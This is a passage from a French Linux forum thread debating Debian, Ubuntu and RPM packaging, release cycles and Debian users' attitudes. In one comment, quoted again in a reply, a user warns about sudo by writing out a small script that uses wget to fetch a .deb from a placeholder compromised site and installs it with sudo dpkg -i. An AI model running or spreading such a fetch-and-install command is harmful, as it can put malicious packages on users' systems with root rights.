                        On ne dit pas "vieille" mais "stable". Debian ne publie pas de versions tous les ans (ou tous les 6 mois) mais quand elle est prête, ce qui peut agacer certains utilisateurs avides de nouveautés. Cependant, dans le monde professionnel, 3 ans c'est finalement peu.

                        - problème de sécurité dernièrement <= c'est une des principales raison.


                        À quel problèmes de sécurité en particulier fais-tu allusion ?

                        - 6mois pour faire des corrections de bugs dans des paquets critiques (bon ok, c'est pour start-stop-daemon dans dpkg, mais c'est pas possible en version finale)


                        Pourrais-tu être plus précis, encore une fois, à ce propos ?
                        Le paquet peut-être critique mais c'est le bogue qui doit avoir une gravité suffisament sérieuse pour que le RM daigne intégrer un correctif, hors corrections de sécurité.

                        Et tant qu'a devoir me gérer un pool de paquet corrigé pour des faille autant ne pas dupliquer ce boulot pour plusieurs distrib.


                        Oui: autant en faire profiter les autres !

                        Ça pue le troll, mais étant sur cooker en ce moment, elle est vraiment plus facile a utiliser.


                        Tout est relatif et une question d'habitude.

                        Quand au format deb, il a quand même un gros défaut :
                        - pas de src.rpm

                        Ui je sais apt-get source machin...

                        Mais pour avoir testé, il y a des problèmes dans tous les sens (par exemple le paquet php4 dois être "apt-get sourcé" a chaque fois car certains patchs ne peux être dé-appliqués)


                        Je ne comprends pas ce que tu veux dire...
                        Lorsque tu "apt-get source" un paquet, les patchs ne sont pas appliqués aux sources originales, au contraire. C'est la phase de construction du paquet qui va les inclure. Et tu peux les enlever aussi facilement qu'en commentant les lignes dans le fichier .spec.

                        L'approche src.rpm est je trouve beaucoup plus pratique, car :
                        - on télécharge un fichier unique (idem)


                        Je ne vois pas en quoi c'est un avantage puisque la commande "apt-get source" se charge de tout.

                        - on le met dans un répertoire


                        Quel est le rapport avec un quelconque avantage ?

                        - on joue pas avec des outils "magique" comme fakeroot qui foirent


                        "fakeroot" n'est ni magique, ni foireux et encore moins spécifique à Debian. Tu n'es pas arrivé à t'en servir correctement, c'est différent.

                        - on peux reprendre une compilation (pour pas se retaper tout le process quand on a un fichier qui merdent a la fin)


                        Là encore, c'est ton ignorance qui te joue des tours. On peut éventuellement reprendre la compilation là où ça s'était arrêté mais, je te l'accorde, ce n'est pas le comportement par défaut.

                        - signature dans le fichier rpm (pour le .deb c'est en dehors si mes souvenir sont bon)


                        On ne signe pas le .deb (bien qu'on puisse) mais le .changes et le .dsc. L'un comme l'autre contienne les sommes MD5, si bien que ça revient au même.

                        Bref; c'est totalement subjectif car tu n'as manifestement fait que survoler la construction d'un paquet debian.
        • [^] # Re: passage a ubuntu

          Posté par . Évalué à 0.

          au boulot, apt pour rpm est devenu la norme: tout est en RedHat ES/AS/WS, mais au lieu d'utiliser cette mauvaise blague qu'est up2date, nous avons choisi de gérer les packages via apt. De fait, ça marche impeccablement. Toute entreprise avec un parc redhat un peu conséquent devrait faire pareil...
          • [^] # Re: passage a ubuntu

            Posté par (page perso) . Évalué à -1.

            À condition d'avoir les effectifs en conséquence. Le problème est qu'alors, tu dois assumer le support des logiciels que tu embarques...
            Je ne dis pas que le client ne va pas te taper dessus au moindre souci mais il est plus facile de démontrer que le problème vient de RedHat lorsqu'on utilise son système de mise à jour, voilà tout.
            L'utilisation de RHEL intervient surtout dans des contextes professionnels avec des besoins de support logiciels et matériels.
            En outre, depuis le rachat de Conectiva par Mandrake/Mandriva, qu'en est-il du développement d'apt-rpm ? Là est la question car si le projet a été abandonné en cours de route, il vous faudra également le supporter. Aurez-vous toujours les effectifs nécessaires ?
            • [^] # Re: passage a ubuntu

              Posté par . Évalué à 1.

              À condition d'avoir les effectifs en conséquence.


              Nous sommes deux pour un parc d'une cinquantaine de serveurs RHEL 2.1,3 et 4, donc l'automatisation est un réel besoin, et nous sommes les clients finaux d'APT puisqu'il est utilisé dans notre gestion.

              De toutes façons en véritable environnement professionnel de grande entreprise, il y a souvent de nombreux éléments software à installer (même si ils ne servent à rien, mais qu'il faut installer pour des raisons politiques ou de standardisation) qui eux-mêmes peuvent casser le support d'une manière ou d'une autre, qui peuvent provoquer d'éternelles parties de ping-pong entre fournisseurs dès que quelque-chose casse...

              Tant qu'une solution apt-rpm fonctionne, nous utiliserons ce format, quand le risque de voir celà ne plus marcher se pointera à l'horizon, il sera temps de migrer vers un nouveau système, mais heureusement, pour le moment, le projet apt-rpm semble encore bien actif...
  • # le monde se divise ...

    Posté par . Évalué à 2.

    > L'ajout de greffons non-libres a été facilité tant par la meilleure
    > répartition en amont (plugins base, good, bad et ugly)

    Le monde se divise en deux catégories : ceux qui utilisent des greffons libres et ceux qui creusent Tu creuses.
  • # Marre de l'elitisme des utilisateurs debian

    Posté par . Évalué à 4.

    Les utilisateurs debian ont toujours eut se sentiment de supériorité: à l'époque où la Mandrake était la porte d'entrée dans le monde Linux, les debianneux refusaient d'aider les '"naab".

    À la question: "comment j'installe ce programme" la réponse était "apt-get install truck , ah t'es pas sous Debian ? ..."

    Maintenant que les "noob" ont enfin une distrib à base d'apt ... les arguments se font plus flous mais la ranqueur toujours présente.

    Pourtant, Debian n'est pas parfaite et il suffit de demander à un Slack user pour vous donner l'argumentation.


    Je ne doûte pas de la qualité de Debian mais par contre de la bonne foie de ses partisans ...
    • [^] # Re: Marre de l'elitisme des utilisateurs debian

      Posté par . Évalué à 3.

      Pas très sympa de traiter les debianneux d'alcooliques.
      • [^] # Re: Marre de l'elitisme des utilisateurs debian

        Posté par (page perso) . Évalué à -1.

        Il a pas traité les debianneux d'alcooliques, il dis juste qu'ils sont trop élitistes...

        Remarque chacun devrait balayer dans sa porte, maintenant c'est ubunteux qui sont atteins de ce symptôme ;)

        Parce que bon : "whaw telle fonctionalité est supportée !!!", alors que ça l'est depuis très longtemps dans une autre distribution (non basée sur deb, qui elle est en retard par rapport aux autres) c'est un peu facile...

        Ce qui m'ennuie le plus c'est pas tant la pub ouvertes et racoleuse que vous faites, mais les débutants qui se font berner par elle et essuie les pots cassés.
        Alors qu'avec une autre distribution connue pour être user-friendly ils ne les aurait pas eu. (bon ok cette distribution dois être mise a jour dès sa sortie pour résoudre des bugs stupides et ennuyeux sur le driver libre nv et kat)

        Pour ce qui est de la sécurité, bon sudo c'est bien, mais activé par défaut c'est plutôt moyen, et vu l'explosion d'ubuntu, je sens que les programmes genre :
        [machin@ubuntu ~]$ cat funy.sh
        #! /bin/sh
        wget http://sitetroué/chemin/basesystem-6.06....deb -O /tmp/basesystem-6.06....deb
        sudo dpkg -i /tmp/basesystem-6.06....deb

        Et bien ça va faire des dégats... (transmis par messagerie instantanée/mail/etc)

        On avait eu le coup du .h exécutable mis en fichier joint dans les mails, maintenant ce genre de scripts a de l'avenir.

        Une approche de demander le mot de passe root lors que lancement de l'utilitaire d'installation de paquet/configuration du système est a mon avis NETTEMENT moins dangereux.
        (genre suse et mandriva)

        Sans parler des site qui doivent "expliquer" comment activer le compte root sans mot de passe, que les spammeurs et autre doivent/devrait sponsoriser...

        </fin coup de geule, pas tapper...>
        • [^] # Re: Marre de l'elitisme des utilisateurs debian

          Posté par . Évalué à 0.

          En parlant d'autres distributions user-friendly, je sais que ça va sentir le troll, mais qu'est-ce que ça vaut face à Mandrake et Fedora?
          Ca fait un moment que je tourne sous Linux, mais je ne connais quasiment que Debian, et là je voudrais installer une distro user-friendly à un ami. Est-ce qu'Ubuntu fait dans le bleeding-edge? Parce que quand je vois Fedora qui intègre gnome 2.14 5 jours après sa sortie, j'ai un peu peur. Ca existe une distribution user-friendly qui package des versions stables? Ubuntu est dans ce cas?
          • [^] # Re: Marre de l'elitisme des utilisateurs debian

            Posté par (page perso) . Évalué à 1.

            Fedora n'a pas à mon sens une telle réputation.
            En outre, il s'agit, à la base, de la distribution de "développement" sur laquelle est ensuite basée RedHat Entreprise Linux (RHEL).
            Quant à Ubuntu, elle utilise Gnome par défaut et son cycle de publication est calé sur celui du projet Gnome, c-a-d une nouvelle version majeure tous les six mois. Ubuntu publie généralement (exception faite de Dapper Drake qui a pris deux mois de retard pour que les niaks puissent avoir Ubuntu en chinois...) une nouvelle version un mois après environ. Ensuite, cette version est dite "stable", au même sens que Debian stable : tu n'auras pas de mises à jour fonctionnelles avant la prochaine version (ou alors exceptionnelles).
            Les seules mises à jour concernent celles de sécurité.
            Typiquement, il a fallu attendre Dapper Drake avant d'avoir Firefox 1.5, car tous les projets n'ont pas une fréquence de publication régulière et il est arrivé par deux fois que le projet Mozilla publie (et ce n'est pas le seul exemple, Il a fallu aussi attendre Dapper pour avoir OpenOffice 2.0, le vrai, pas la 1.99.x) Firefox peu (un mois ou deux) après la sortie de la nouvelle Ubuntu. Je ne dis pas qu'ils le font exprès mais que c'est dommage et je pense qu'ils ne se de toutes façons préoccupent pas énormément de la plate-forme Linux en général.
        • [^] # Re: Marre de l'elitisme des utilisateurs debian

          Posté par (page perso) . Évalué à 3.

          Il a pas traité les debianneux d'alcooliques

          C'est triste de tout prendre au premier degré.

          Relis bien :
          Je ne doûte pas de la qualité de Debian mais par contre de la bonne foie de ses partisans ...
          Puis
          Pas très sympa de traiter les debianneux d'alcooliques.

          Je te fais confiance pour saisir la blague tout seul.
        • [^] # Re: Marre de l'elitisme des utilisateurs debian

          Posté par (page perso) . Évalué à 0.

          Ce qui m'ennuie le plus c'est pas tant la pub ouvertes et racoleuse que vous faites, mais les débutants qui se font berner par elle et essuie les pots cassés.
          Alors qu'avec une autre distribution connue pour être user-friendly ils ne les aurait pas eu. (bon ok cette distribution dois être mise a jour dès sa sortie pour résoudre des bugs stupides et ennuyeux sur le driver libre nv et kat)

          Pour ce qui est de la sécurité, bon sudo c'est bien, mais activé par défaut c'est plutôt moyen, et vu l'explosion d'ubuntu, je sens que les programmes genre :
          [machin@ubuntu ~]$ cat funy.sh
          #! /bin/sh
          wget http://sitetroué/chemin/basesystem-6.06....deb -O /tmp/basesystem-6.06....deb
          sudo dpkg -i /tmp/basesystem-6.06....deb

          Et bien ça va faire des dégats... (transmis par messagerie instantanée/mail/etc)


          C'est un faux-argument. Ils n'ont pas attendu sudo pour avoir une console root (voire se loguer en root comme ils se loguaient en "Administrateur"') et taper les commandes nécessaires ou installer des paquets non-officiels venus d'on-ne-sait-où (quand ils ne les compilent pas à la main). Si l'utilisateur n'est pas sensibilisé aux problèmes de sécurité (voir les problèmes de virus transmis par mail: de plus en plus de non-initiés utilisent Thunderbird à cette fin), aucun système de sécurité ne sera efficace.
    • [^] # Re: Marre de l'elitisme des utilisateurs debian

      Posté par (page perso) . Évalué à 1.

      Ubuntu n'est pas réservée aux noob.
      Sa facilité d'utilisation la réserve aussi aux gens qui aime se servir de leur distrib, et qui n'aime pas passer de temps à la mettre à jour, à l'administrer, etc.

      Y'a enfin une bonne distrib pour le desktop, oui, ne nous en plaignons pas.

      (c'est un mec passé par slack, fedora, debian et gentoo qui dit ça)

Suivre le flux des commentaires

Note : les commentaires appartiennent à ceux qui les ont postés. Nous n'en sommes pas responsables.